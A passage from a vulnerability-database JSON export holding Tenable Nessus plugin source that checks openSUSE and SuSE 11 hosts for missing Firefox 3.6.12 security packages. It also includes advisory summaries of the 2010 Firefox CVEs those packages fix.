library.\n\nMFSA 2010-73 / CVE-2010-3765: Morten Kråkvik of Telenor SOC\nreported an exploit targeting particular versions of Firefox 3.6 on\nWindows XP that Telenor found while investigating an intrusion attempt\non a customer network. The underlying vulnerability, however, was\npresent on both the Firefox 3.5 and Firefox 3.6 development branches\nand affected all supported platforms.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=645315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=649492\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaFirefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"MozillaFirefox-3.6.12-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"MozillaFirefox-branding-upstream-3.6.12-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"MozillaFirefox-translations-common-3.6.12-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"MozillaFirefox-translations-other-3.6.12-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-js192-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-xulrunner192-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-xulrunner192-buildsymbols-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-xulrunner192-devel-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-xulrunner192-translations-common-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"mozilla-xulrunner192-translations-other-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-js192-32bit-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-common-32bit-1.9.2.12-0.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-other-32bit-1.9.2.12-0.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:56:54", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-67.html", "http://support.novell.com/security/cve/CVE-2010-3179.html", "http://support.novell.com/security/cve/CVE-2010-3178.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-73.html", "http://support.novell.com/security/cve/CVE-2010-3180.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-68.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-66.html", "http://support.novell.com/security/cve/CVE-2010-3183.html", "http://support.novell.com/security/cve/CVE-2010-3170.html", "http://support.novell.com/security/cve/CVE-2010-3175.html", "http://support.novell.com/security/cve/CVE-2010-3174.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-64.html", "http://support.novell.com/security/cve/CVE-2010-3765.html", "https://bugzilla.novell.com/show_bug.cgi?id=645315", "http://www.mozilla.org/security/announce/2010/mfsa2010-69.html", "http://support.novell.com/security/cve/CVE-2010-3177.html", "https://bugzilla.novell.com/show_bug.cgi?id=649492", "http://support.novell.com/security/cve/CVE-2010-3182.html", "http://support.novell.com/security/cve/CVE-2010-3176.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-65.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-70.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-71.html"], "pluginID": "50876", "description": "This update brings Mozilla Firefox to version 3.6.12, fixing various bugs and security issues.\n\nThe following security issues were fixed :\n\n - Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code. References. (MFSA 2010-64)\n\n Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh Soref reported memory safety problems that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - Gary Kwong, Martijn Wargers and Siddharth Agarwal reported memory safety problems that affected Firefox 3.6 only. (CVE-2010-3176)\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\n - Security researcher Alexander Miller reported that passing an excessively long string to document.write could cause text rendering routines to end up in an inconsistent state with sections of stack memory being overwritten with the string data. An attacker could use this flaw to crash a victim's browser and potentially run arbitrary code on their computer. (MFSA 2010-65 / CVE-2010-3179)\n\n - Security researcher Sergey Glazunov reported that it was possible to access the locationbar property of a window object after it had been closed. Since the closed window's memory could have been subsequently reused by the system it was possible that an attempt to access the locationbar property could result in the execution of attacker-controlled memory. (MFSA 2010-66 / CVE-2010-3180)\n\n - Security researcher regenrecht reported via TippingPoint's Zero Day Initiative that when window.lookupGetter is called with no arguments the code assumes the top JavaScript stack value is a property name. Since there were no arguments passed into the function, the top value could represent uninitialized memory or a pointer to a previously freed JavaScript object. Under such circumstances the value is passed to another subroutine which calls through the dangling pointer, potentially executing attacker-controlled memory. (MFSA 2010-67 / CVE-2010-3183)\n\n - Google security researcher Robert Swiecki reported that functions used by the Gopher parser to convert text to HTML tags could be exploited to turn text into executable JavaScript. If an attacker could create a file or directory on a Gopher server with the encoded script as part of its name the script would then run in a victim's browser within the context of the site. (MFSA 2010-68 / CVE-2010-3177)\n\n - Security researcher Eduardo Vela Nava reported that if a web page opened a new window and used a javascript: URL to make a modal call, such as alert(), then subsequently navigated the page to a different domain, once the modal call returned the opener of the window could get access to objects in the navigated window. This is a violation of the same-origin policy and could be used by an attacker to steal information from another web site.\n (MFSA 2010-69 / CVE-2010-3178)\n\n - Security researcher Richard Moore reported that when an SSL certificate was created with a common name containing a wildcard followed by a partial IP address a valid SSL connection could be established with a server whose IP address matched the wildcard range by browsing directly to the IP address. It is extremely unlikely that such a certificate would be issued by a Certificate Authority. (MFSA 2010-70 / CVE-2010-3170)\n\n - Dmitri Gribenko reported that the script used to launch Mozilla applications on Linux was effectively including the current working directory in the LDLIBRARYPATH environment variable. If an attacker was able to place into the current working directory a malicious shared library with the same name as a library that the bootstrapping script depends on the attacker could have their library loaded instead of the legitimate library.\n (MFSA 2010-71 / CVE-2010-3182)\n\n - Morten Krokvik of Telenor SOC reported an exploit targeting particular versions of Firefox 3.6 on Windows XP that Telenor found while investigating an intrusion attempt on a customer network. The underlying vulnerability, however, was present on both the Firefox 3.5 and Firefox 3.6 development branches and affected all supported platforms. (MFSA 2010-73 / CVE-2010-3765)", "edition": 4, "reporter": "Tenable", "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : Mozilla Firefox (SAT Patch Numbers 3455 / 3456)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2013-11-27T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-translations", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-gnome", "p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations", "p-cpe:/a:novell:suse_linux:11:MozillaFirefox", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-translations-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-gnome-32bit"], "id": "SUSE_11_MOZILLAFIREFOX-101103.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50876", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50876);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2013/11/27 17:11:05 $\");\n\n script_cve_id(\"CVE-2010-3170\", \"CVE-2010-3174\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : Mozilla Firefox (SAT Patch Numbers 3455 / 3456)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings Mozilla Firefox to version 3.6.12, fixing various\nbugs and security issues.\n\nThe following security issues were fixed :\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. References. (MFSA 2010-64)\n\n Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor\n Bukanov and Josh Soref reported memory safety problems\n that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - Gary Kwong, Martijn Wargers and Siddharth Agarwal\n reported memory safety problems that affected Firefox\n 3.6 only. (CVE-2010-3176)\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\n - Security researcher Alexander Miller reported that\n passing an excessively long string to document.write\n could cause text rendering routines to end up in an\n inconsistent state with sections of stack memory being\n overwritten with the string data. An attacker could use\n this flaw to crash a victim's browser and potentially\n run arbitrary code on their computer. (MFSA 2010-65 /\n CVE-2010-3179)\n\n - Security researcher Sergey Glazunov reported that it was\n possible to access the locationbar property of a window\n object after it had been closed. Since the closed\n window's memory could have been subsequently reused by\n the system it was possible that an attempt to access the\n locationbar property could result in the execution of\n attacker-controlled memory. (MFSA 2010-66 /\n CVE-2010-3180)\n\n - Security researcher regenrecht reported via\n TippingPoint's Zero Day Initiative that when\n window.lookupGetter is called with no arguments the code\n assumes the top JavaScript stack value is a property\n name. Since there were no arguments passed into the\n function, the top value could represent uninitialized\n memory or a pointer to a previously freed JavaScript\n object. Under such circumstances the value is passed to\n another subroutine which calls through the dangling\n pointer, potentially executing attacker-controlled\n memory. (MFSA 2010-67 / CVE-2010-3183)\n\n - Google security researcher Robert Swiecki reported that\n functions used by the Gopher parser to convert text to\n HTML tags could be exploited to turn text into\n executable JavaScript. If an attacker could create a\n file or directory on a Gopher server with the encoded\n script as part of its name the script would then run in\n a victim's browser within the context of the site. (MFSA\n 2010-68 / CVE-2010-3177)\n\n - Security researcher Eduardo Vela Nava reported that if a\n web page opened a new window and used a javascript: URL\n to make a modal call, such as alert(), then subsequently\n navigated the page to a different domain, once the modal\n call returned the opener of the window could get access\n to objects in the navigated window. This is a violation\n of the same-origin policy and could be used by an\n attacker to steal information from another web site.\n (MFSA 2010-69 / CVE-2010-3178)\n\n - Security researcher Richard Moore reported that when an\n SSL certificate was created with a common name\n containing a wildcard followed by a partial IP address a\n valid SSL connection could be established with a server\n whose IP address matched the wildcard range by browsing\n directly to the IP address. It is extremely unlikely\n that such a certificate would be issued by a Certificate\n Authority. (MFSA 2010-70 / CVE-2010-3170)\n\n - Dmitri Gribenko reported that the script used to launch\n Mozilla applications on Linux was effectively including\n the current working directory in the LDLIBRARYPATH\n environment variable. If an attacker was able to place\n into the current working directory a malicious shared\n library with the same name as a library that the\n bootstrapping script depends on the attacker could have\n their library loaded instead of the legitimate library.\n (MFSA 2010-71 / CVE-2010-3182)\n\n - Morten Krokvik of Telenor SOC reported an exploit\n targeting particular versions of Firefox 3.6 on Windows\n XP that Telenor found while investigating an intrusion\n attempt on a customer network. The underlying\n vulnerability, however, was present on both the Firefox\n 3.5 and Firefox 3.6 development branches and affected\n all supported platforms. (MFSA 2010-73 / CVE-2010-3765)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-64.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-65.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-66.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-67.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-68.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-69.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-70.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-71.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-73.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=645315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=649492\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3170.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3174.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3175.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3176.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3177.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3178.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3179.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3180.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3182.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3183.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3765.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3455 / 3456 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-gnome-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner192-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"MozillaFirefox-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"MozillaFirefox-translations-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner192-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner192-translations-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"MozillaFirefox-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"MozillaFirefox-translations-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"MozillaFirefox-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"MozillaFirefox-translations-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner192-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner192-translations-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"MozillaFirefox-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"MozillaFirefox-translations-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"MozillaFirefox-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"MozillaFirefox-translations-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner192-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner192-translations-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"MozillaFirefox-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"MozillaFirefox-translations-3.6.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner192-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner192-translations-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-06-06T18:05:53", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.6.12-1.el6_0", "arch": "i686", "packageName": "firefox-debuginfo", "packageFilename": 